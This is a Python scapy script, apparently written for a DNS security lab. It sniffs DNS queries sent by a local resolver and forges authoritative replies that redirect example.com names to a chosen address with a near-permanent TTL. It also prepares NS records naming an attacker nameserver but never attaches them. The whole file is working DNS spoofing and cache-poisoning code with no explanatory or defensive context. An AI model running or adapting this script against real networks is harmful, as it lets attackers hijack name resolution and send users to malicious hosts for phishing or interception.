#!/usr/bin/env python3

from scapy.all import *
from scapy.layers.dns import DNS, DNSQR, DNSRR
from scapy.layers.inet import IP, UDP

NS_NAME = "example.com"
DNS_SER_IP = "10.9.0.53"
ATTACKER_NAMESERVER = "ns.attacker32.com"
ATTACKER_NAMESERVER_IP = "10.9.0.153"

def spoof_dns(pkt):
    if DNS in pkt and NS_NAME in pkt[DNS].qd.qname.decode('utf-8'):
        print(pkt.sprintf("{DNS: %IP.src% --> %IP.dst%: %DNS.id%}"))
        ip = IP(dst=pkt[IP].src, src=pkt[IP].dst) 
        udp = UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) 
        Anssec = DNSRR(rrname=pkt[DNS].qd.qname, type='A', rdata='1.2.3.5', ttl=999999) 
        Nssec = DNSRR(rrname=NS_NAME, type='NS', rdata=ATTACKER_NAMESERVER, ttl=999999)
        Assec = DNSRR(rrname=ATTACKER_NAMESERVER, type='A', rdata=ATTACKER_NAMESERVER_IP, ttl=999999)
        dns = DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1, qr=1, an=Anssec) 
        spoofpkt = ip/udp/dns 
        send(spoofpkt)

myFilter = "udp dst port 53 and ip src " + DNS_SER_IP 
pkt = sniff(iface='br-c1e3c02a8177', filter=myFilter, prn=spoof_dns)